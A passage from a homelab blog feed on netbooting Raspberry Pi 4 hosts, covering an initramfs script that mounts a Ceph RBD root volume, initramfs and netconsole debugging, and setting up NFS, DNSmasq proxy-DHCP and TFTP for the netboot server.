</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">elif</span> <span style="color:#f92672">[</span> -e /sys/bus/rbd/add <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		rbd_bus<span style="color:#f92672">=</span>/sys/bus/rbd/add
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>		echo <span style="color:#e6db74">&#34;ERROR: /sys/bus/rbd/add does not exist&#34;</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># tell the kernel rbd client to map the block device</span>
</span></span><span style="display:flex;"><span>	echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>mons<span style="color:#e6db74">}</span><span style="color:#e6db74"> name=</span><span style="color:#e6db74">${</span>user<span style="color:#e6db74">}</span><span style="color:#e6db74">,secret=</span><span style="color:#e6db74">${</span>key<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>pool<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>snap<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> &gt; <span style="color:#e6db74">${</span>rbd_bus<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># figure out where the block device appeared</span>
</span></span><span style="display:flex;"><span>	dev<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>ls /dev/rbd* | grep <span style="color:#e6db74">&#39;/dev/rbd[0-9]*$&#39;</span> | tail -n 1<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># add partition if set</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>partition<span style="color:#e6db74">}</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		dev<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>dev<span style="color:#e6db74">}</span>p<span style="color:#e6db74">${</span>partition<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>In the first part, the <code>rbdroot</code> kernel command line parameter is parsed. Then
the volume is mapped to the local host. Instead of adding Ceph&rsquo;s CLI tools with
all of their dependencies to the initramfs, the script writes directly to the
RBD kernel module&rsquo;s <code>/sys/bus/rbd</code> interface.
As the final mapping step, the path of the new device is stored in the <code>dev</code> variable.</p>
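<p>With the placeholder values from the example <code>rbdroot</code> line above and no snapshot,
the write the script performs roughly expands to the following (a sketch for
illustration, not copied from a real boot):</p>
<pre tabindex="0"><code>echo &#34;10.86.5.105,10.86.5.102,10.86.5.104 name=AUTHX-USERNAME,secret=AUTHX-PASSWORD mypool myvolume&#34; &gt; /sys/bus/rbd/add_single_major
# the kernel then creates the block device, e.g.
ls /dev/rbd*
</code></pre>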
<p>The last step of the process is the mount itself, which happens in the
<code>rbd_mount_root_impl</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rbd_mount_root_impl<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>readonly<span style="color:#e6db74">}</span> <span style="color:#f92672">=</span> y <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		roflag<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-r&#34;</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>		roflag<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-w&#34;</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> ! -z <span style="color:#e6db74">&#34;</span>$mountopts<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span> ; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		mountopts<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o </span>$mountopts<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># get the root filesystem type if not set</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ROOTFSTYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		FSTYPE<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>get_fstype <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>dev<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>		FSTYPE<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTFSTYPE<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	rbd_premount
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># mount the fs</span>
</span></span><span style="display:flex;"><span>	modprobe <span style="color:#e6db74">${</span>FSTYPE<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	echo <span style="color:#e6db74">&#34;EXECUTING: \&#34;mount -t </span><span style="color:#e6db74">${</span>FSTYPE<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>roflag<span style="color:#e6db74">}</span><span style="color:#e6db74">,</span><span style="color:#e6db74">${</span>mountopts<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span>$dev<span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>	mount -t <span style="color:#e6db74">${</span>FSTYPE<span style="color:#e6db74">}</span> <span style="color:#e6db74">${</span>roflag<span style="color:#e6db74">}</span> <span style="color:#e6db74">${</span>mountopts<span style="color:#e6db74">}</span> $dev <span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>This function just determines the filesystem type and then executes a normal
mount call.</p>
<p>And with that, we are done. The RBD volume should now be mounted and ready
to be used as the root device for our host.</p>
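<p>Once the host is up, a quick sanity check (output shortened and illustrative, it
will differ on your system) is to ask where the root filesystem actually lives:</p>
<pre tabindex="0"><code>findmnt /
TARGET SOURCE    FSTYPE OPTIONS
/      /dev/rbd0 ext4   rw,noatime
</code></pre>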
<h1 id="debugging">Debugging</h1>
<p>So how to debug your initramfs? Let&rsquo;s start with where to find it. That should
be pretty simple: It&rsquo;s going to be in your <code>/boot</code> directory, right alongside
the kernel image.</p>
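<p>On an Ubuntu or Debian based system that typically looks something like this
(illustrative listing, the exact file names depend on your kernel version):</p>
<pre tabindex="0"><code>ls /boot
config-5.15.0-XX-generic  initrd.img-5.15.0-XX-generic  vmlinuz-5.15.0-XX-generic  ...
</code></pre>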
<h2 id="manipulating-an-initramfs">Manipulating an initramfs</h2>
<p>While constructing an initramfs, especially for netbooting outside the default
NFS option, it might be useful to be able to look at an initramfs&rsquo; content.</p>
<p>A good overview of how to unpack and repack an initramfs can be found in
<a href="https://backreference.org/2010/07/04/modifying-initrdinitramfs-files/">this blog article</a>.</p>
<p>First, figure out what compression the initramfs uses by running:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>file /path/to/initramfs
</span></span></code></pre></div><p>The following command will unpack an image:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>gunzip -c /path/to/initramfs | cpio -i
</span></span></code></pre></div><p>This works for a gzip compressed image. If you have, for example, a zstd
compressed image, just replace <code>gunzip -c</code> with <code>zstdcat</code>.</p>
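<p>For a zstd compressed image, the unpack step would then look like this:</p>
<pre tabindex="0"><code>zstdcat /path/to/initramfs | cpio -i
</code></pre>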
<p>To repackage the image after making your changes, run the commands in reverse:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>find . | cpio -H newc -o | gzip -9 &gt; /path/for/new/image
</span></span></code></pre></div><h2 id="getting-logs-from-a-remote-boot">Getting logs from a remote boot</h2>
<p>One important question when debugging: How do I see the console output of the
initramfs scripting if I don&rsquo;t have a monitor connected to the machine?</p>
<p>This can be accomplished with the <code>netconsole</code> kernel option and <code>netcat</code>.</p>
<p>The kernel docs for the netconsole feature can be found <a href="https://www.kernel.org/doc/Documentation/networking/netconsole.txt">here</a>.</p>
<p>An example <code>netconsole=</code> kernel command line parameter would look like this:</p>
<pre tabindex="0"><code>netconsole=4444@10.0.0.1/eth1,9353@10.0.0.2/12:34:56:78:9a:bc
</code></pre><p>The parameters are as follows:</p>
<ul>
<li><code>4444</code>: The source port to use for sending (port on the host producing the logs)</li>
<li><code>10.0.0.1</code>: IP of the host producing the logs</li>
<li><code>/eth1</code>: Name of the NIC to use (be aware that this might differ from the name in the booted system, as systemd/udev change the name for predictable NIC naming)</li>
<li><code>9353@10.0.0.2</code>: Target port and IP on the machine which is listening for the logs</li>
<li><code>/12:34:56:78:9a:bc</code>: MAC address of the listening machine (find this with <code>ip link</code>)</li>
</ul>
<p>On the receiver side, the machine where you want to collect the logs, you can
use netcat: <code>nc -u -l &lt;port&gt;</code>, where <code>&lt;port&gt;</code> in the above example
<code>netconsole</code> line would be <code>9353</code>.</p>
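<p>If you want to keep the output around for later inspection, you can also pipe it
into a file, for example:</p>
<pre tabindex="0"><code>nc -u -l 9353 | tee initramfs-console.log
</code></pre>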
<h1 id="closing">Closing</h1>
<p>I hope that with the above article, I was able to generate the same &ldquo;Huh, it&rsquo;s that
simple?&rdquo; reaction and delight that rummaging through the initramfs created for me.</p>
<p>The next and last article in this series will give a short overview on how to
create a HashiCorp Packer image and Ansible playbook for a netbooting Raspberry
Pi.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part II: The Netboot Server</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/netboot-server/</link>
      <pubDate>Tue, 02 Aug 2022 00:11:09 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/netboot-server/</guid>
      <description>How Raspberry Pi netbooting works and how to set up a netboot server</description>
      <content:encoded><![CDATA[<p>In this article, I will provide an overview of how netbooting with the Raspberry
Pi 4 works and how to configure a server off of which you can boot your Pi.</p>
<p>Several components are needed for netbooting a Pi:</p>
<ul>
<li>The Pi itself needs to have netbooting in its boot order config</li>
<li>A DHCP server is needed to provide IPs for the Pi and the TFTP server. In this
series, the IP for the Pi will be provided by my OPNsense firewall and the
netboot options will be provided by DNSmasq.</li>
<li>A <a href="https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol">TFTP</a> (<strong>T</strong>rivial <strong>F</strong>ile <strong>T</strong>ransfer <strong>P</strong>rotocol) server to provide the boot files</li>
</ul>
<h1 id="prerequisites">Prerequisites</h1>
<p>For this article, the following things are assumed to be present:</p>
<ul>
<li>A Raspberry Pi 4 you would like to netboot</li>
<li>A server which will serve as the netboot server. This can be another Pi or
any other server you have running in your Homelab.</li>
<li>A DHCP server</li>
<li>An NFS server</li>
</ul>
<h1 id="how-the-raspberry-pi-netboot-works">How the Raspberry Pi netboot works</h1>
<p>When a Raspberry Pi boots, it tries a configurable sequence of boot types and
uses the first one which works. The boot order is configured in the Pi
bootloader config. The documentation on all available boot options can be found
<a href="https://www.raspberrypi.com/documentation/computers/raspberry-pi.html#BOOT_ORDER">in the official docs</a>.</p>
<p>Interesting for us is the netboot option, <code>0x2</code>.</p>
<p>To change the bootloader config, you need to boot into an OS and run the
<code>rpi-eeprom-config</code> tool. As described in the <a href="https://www.raspberrypi.com/documentation/computers/raspberry-pi.html#raspberry-pi-4-bootloader-configuration">Pi docs</a>, you can run the following
command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>sudo -E rpi-eeprom-config --edit
</span></span></code></pre></div><p>This will pop up an editor with config looking like this:</p>
<pre tabindex="0"><code>[all]
BOOT_UART=0
WAKE_ON_GPIO=1
POWER_OFF_ON_HALT=0
BOOT_ORDER=0xf241
</code></pre><p>Please note: The <code>BOOT_ORDER</code> option might not be present in a fresh Pi. You can
simply add the line at the end.</p>
<p>One important point for the <code>BOOT_ORDER</code> variable: It is read from right to left,
not from left to right. So the boot order in the above example will try the
following options in order:</p>
<ol>
<li>SD card/eMMC boot (<code>0x1</code>)</li>
<li>USB boot (<code>0x4</code>)</li>
<li>Network boot (<code>0x2</code>)</li>
<li>Start again from 1) (<code>0xf</code>)</li>
</ol>
<p>I like the above <code>BOOT_ORDER</code> value because it allows me to short-circuit the
boot to a USB stick or SD card if something is wrong with the netboot setup.
This setup has one caveat though: it&rsquo;s not usable for booting Pi CM4s with eMMC
storage. Because the eMMC storage can&rsquo;t actually be removed, the Pi would always
find it and boot off of it if it holds a working image. For CM4s, I would move
the eMMC option to the very end of the sequence or remove it completely and just
rely on a USB stick when things go south with netbooting.</p>
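<p>For such a CM4 setup, a possible value (a sketch I have not tested on real
hardware) would push the eMMC option to the end:</p>
<pre tabindex="0"><code>BOOT_ORDER=0xf142
</code></pre><p>Read right to left, this tries network boot (<code>0x2</code>) first, then USB (<code>0x4</code>), then
SD card/eMMC (<code>0x1</code>), and finally starts over (<code>0xf</code>).</p>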
<p>The netboot itself roughly follows this order:</p>
<ol>
<li>Broadcast a DHCP request</li>
<li>Receive DHCP response and configure IP</li>
<li>Receive DHCP proxy response</li>
<li>Take TFTP server address from DHCP response</li>
<li>Contact TFTP server and check if <code>&lt;SERIAL&gt;/start.elf</code> can be found</li>
<li>If it can be found, request all further files from <code>&lt;SERIAL&gt;/</code></li>
<li>Otherwise, further files will be requested without a directory prefix</li>
<li>Start downloading boot configs, initramfs and the kernel</li>
</ol>
<p>This sequence can also be found in the <a href="https://www.raspberrypi.com/documentation/computers/raspberry-pi.html#network-booting">official documentation</a>.</p>
<p>The first interesting part to note is the <em>Receive DHCP proxy response</em> step.
Due to this, we can set up a separate DNSmasq server which only serves the
netboot relevant options, while leaving whatever main DHCP server you are using
undisturbed.</p>
<p>The second important part is about the <code>&lt;SERIAL&gt;</code> directory the Pi tries first.
This mechanism first checks whether the required files can be found in a
subdirectory on the netboot server corresponding to the Pi&rsquo;s serial number.
This way, we can supply separate kernels and configs for different Pis in the
network.
The serial number can be found with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>cat /proc/cpuinfo | grep Serial
</span></span><span style="display:flex;"><span>Serial		: 10000000bf9fed6f
</span></span></code></pre></div><p>The serial number the Pi checks during netboot to find device specific files
is the last part starting after the long string of zeroes. In this example, the
serial would be <code>bf9fed6f</code>.</p>
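<p>If you were preparing the TFTP root by hand, this would boil down to creating a
matching subdirectory and putting the boot files for that Pi into it (a sketch;
in my setup this directory lives on the NFS share described below):</p>
<pre tabindex="0"><code>mkdir /mnt/netboot/bf9fed6f
cp /path/to/boot/files/* /mnt/netboot/bf9fed6f/
</code></pre>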
<h1 id="nfs-boot-dir">NFS boot dir</h1>
<p>So where are the kernel and all the other boot files coming from? The answer:
An NFS mount. This is due to the following problem: When running a system update
on a netbooting machine, how are the new kernel and dtbs going to find their
way to the TFTP server?
You could always go with just copying the files after the update,
but I believe just having the <code>/boot</code> directory on an NFS mount shared between
the netbooting Pi and the TFTP server makes system updates seamless.</p>
<p>So the first thing you need is an NFS server. For my setup, I&rsquo;m using
<a href="https://github.com/nfs-ganesha/nfs-ganesha">NFS Ganesha</a> deployed via my Ceph
cluster, backed by a CephFS volume. The documentation for setting that up can
be found <a href="https://docs.ceph.com/en/latest/mgr/nfs/">here</a>. But any NFS server
will do.</p>
<p>The following gives a brief overview of how to set up an NFS share on a Ceph
cluster.
To begin with, create a CephFS subvolume to back the NFS share.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume create homenet-fs picluster-boot
</span></span></code></pre></div><p>Here, <code>homenet-fs</code> is the name of my CephFS volume, while <code>picluster-boot</code>
is the name of the new subvolume.
Next, create the NFS Ganesha cluster itself, if you do not have an NFS cluster
yet:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph nfs cluster create hn-nfs <span style="color:#e6db74">&#34;nfs-host&#34;</span>
</span></span></code></pre></div><p>This will create a cluster called <code>hn-nfs</code> with an NFS Ganesha daemon being
automatically deployed (via <code>cephadm</code>) on the cluster host <code>nfs-host</code>.
Now, you can create the NFS export for the netboot boot files:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph nfs export create cephfs --cluster-id hn-nfs --pseudo-path /picluster-boot --fsname homenet-fs --path /cephfs/path/to/subvolume --client_addr 10.86.5.0/24
</span></span></code></pre></div><p>This command creates an NFS export reachable at <code>/picluster-boot</code>, using the
CephFS subvolume <code>picluster-boot</code> we created above as backing storage and
restricting access to my local cluster subnet.
To get the right parameter for the <code>--path</code> argument, you can use this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume getpath homenet-fs picluster-boot
</span></span><span style="display:flex;"><span>/cephs/path/to/subvolume
</span></span></code></pre></div><p>One important note on permissions. I had to configure NFS to squash all
access to the <code>nobody</code> user. This is due to the fact that Ubuntu installs the
kernel with permissions <code>600</code> and owner <code>root</code>. Consequently, the TFTP server
not running under <code>root</code> was not able to read the kernel when the Pi requested
it during netboot.</p>
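<p>How the squashing is configured depends on your NFS server. With a plain kernel
NFS server it would be an export option along these lines (an illustrative
<code>/etc/exports</code> sketch, not my actual NFS Ganesha configuration):</p>
<pre tabindex="0"><code>/srv/netboot 10.86.5.0/24(rw,all_squash,anonuid=65534,anongid=65534)
</code></pre>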
<p>Another important note concerns bootstrapping your Homelab.
Think about where/how you provide the NFS server. Obviously, it should not
be located on a host which is netbooting itself. This also goes for putting
it into your k8s cluster if your cluster nodes, or any of the services your
cluster nodes need to come up, do netbooting.
In my setup, the Ceph cluster is a <em>no dependencies</em> setup, meaning it can
always boot up without needing absolutely anything else from my Homelab. So
it&rsquo;s pretty safe to run the NFS mount for the boot directories off of Ceph.</p>
<p>For the mounts themselves, I&rsquo;m mounting the full NFS netboot directory on the
TFTP server like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cfg" data-lang="cfg"><span style="display:flex;"><span><span style="color:#a6e22e">nfs-host:/picluster-boot /mnt/netboot nfs defaults,timeo</span><span style="color:#f92672">=</span><span style="color:#e6db74">900,_netdev 0 0</span>
</span></span></code></pre></div><p>This mounts the <code>picluster-boot</code> NFS export at <code>/mnt/netboot</code>. Again, note
that I&rsquo;m using <code>nfs-host</code>, a hostname instead of an IP. This means that for
netbooting to work, I need working DNS, because otherwise my TFTP server
is not going to be able to access the boot files. So don&rsquo;t make your local DNS
dependent on a netbooted machine.</p>
<p>On the Pi itself, the <code>/boot</code> directory would be mounted like this in
<code>/etc/fstab</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cfg" data-lang="cfg"><span style="display:flex;"><span><span style="color:#a6e22e">nfs-host:/picluster-boot/bf9fed6f /boot/firmware nfs defaults,timeo</span><span style="color:#f92672">=</span><span style="color:#e6db74">900,_netdev 0 0</span>
</span></span></code></pre></div><p>As before, the serial number is important here, providing a separate subdirectory
for each device on the NFS mount.</p>
<p>With this setup, whenever one of the netboot hosts is updated and files in
<code>/boot/firmware</code> are changed, they are also automatically changed on the TFTP
server, not requiring out-of-band synchronization of the TFTP server and the actual
host after an OS update.</p>
<h1 id="dnsmasq-and-tftp">DNSmasq and TFTP</h1>
<p>For the TFTP server, I chose <a href="https://thekelleys.org.uk/dnsmasq/doc.html">DNSmasq</a>.</p>
<p>This fulfills two different roles: The first one is to provide the DHCP option
telling the netbooting host where to find the TFTP server. The second function
is providing the TFTP server itself.</p>
<p>The configuration file for DNSmasq looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>port=0
</span></span><span style="display:flex;"><span>dhcp-range=10.86.5.255,proxy
</span></span><span style="display:flex;"><span>log-dhcp
</span></span><span style="display:flex;"><span>enable-tftp
</span></span><span style="display:flex;"><span>tftp-root=/mnt/netboot
</span></span><span style="display:flex;"><span>pxe-service=0,&#34;Raspberry Pi Boot&#34;
</span></span></code></pre></div><p>The <code>port=0</code> option is there to completely disable DNS functionality, as I have
got another DNS server already set up on my OPNsense firewall.</p>
<p>The <code>dhcp-range=10.86.5.255,proxy</code> config tells DNSmasq not to function as a
normal DHCP server. This ensures that there are no conflicts between your
network&rsquo;s main DHCP server and this DNSmasq instance. It will only answer with
netboot info, but will not hand out IPs to hosts.</p>
<p><code>log-dhcp</code> just enables a bit more logging.</p>
<p><code>enable-tftp</code> and <code>tftp-root=/mnt/netboot</code> configure DNSmasq&rsquo;s TFTP server for
providing the boot files, with the root for the files being set to the previously
configured NFS mount.
Finally, <code>pxe-service=0,&quot;Raspberry Pi Boot&quot;</code> provides a PXE boot option. The
<code>0</code> value here means that when the option is chosen in a boot menu, the netboot
will be aborted. This is not relevant for our Pi netboot case here, though.</p>
<p>After setting up this configuration, a full netboot will produce log output
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>2408886387 available DHCP subnet: 10.86.5.255/255.255.255.0
</span></span><span style="display:flex;"><span>2408886387 vendor class: PXEClient:Arch:00000:UNDI:002001
</span></span><span style="display:flex;"><span>2408886387 PXE(eth0) e4:5f:01:98:e0:82 proxy
</span></span><span style="display:flex;"><span>2408886387 tags: eth0
</span></span><span style="display:flex;"><span>2408886387 broadcast response
</span></span><span style="display:flex;"><span>2408886387 sent size:  1 option: 53 message-type  2
</span></span><span style="display:flex;"><span>2408886387 sent size:  4 option: 54 server-identifier  10.86.5.152
</span></span><span style="display:flex;"><span>2408886387 sent size:  9 option: 60 vendor-class  50:58:45:43:6c:69:65:6e:74
</span></span><span style="display:flex;"><span>2408886387 sent size: 17 option: 97 client-machine-id  00:34:69:50:52:15:31:d0:00:01:98:e0:82:6f...
</span></span><span style="display:flex;"><span>2408886387 sent size: 32 option: 43 vendor-encap  06:01:03:0a:04:00:50:58:45:09:14:00:00:11...
</span></span><span style="display:flex;"><span>2408886387 available DHCP subnet: 10.86.5.255/255.255.255.0
</span></span><span style="display:flex;"><span>2408886387 vendor class: PXEClient:Arch:00000:UNDI:002001
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/start4.elf to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/pieeprom.sig not found
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/recover4.elf not found
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/recovery.elf not found
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/start4.elf to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/fixup4.dat to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/recovery.elf not found
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/dt-blob.bin not found
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/recovery.elf not found
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/bootcfg.txt not found
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/initrd.img to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/initrd.img to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/bcm2711-rpi-4-b.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/bcm2711-rpi-4-b.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/overlays/overlay_map.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/overlay_map.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/dwc2.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/dwc2.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/overlays/disable-bt.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-bt.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-wifi.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-wifi.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/cmdline.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/cmdline.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span><span style="display:flex;"><span>file /mnt/netboot/bf9fed6f/armstub8-gic.bin not found
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span><span style="display:flex;"><span>error 0 Early terminate received from 10.86.5.151
</span></span><span style="display:flex;"><span>failed sending /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
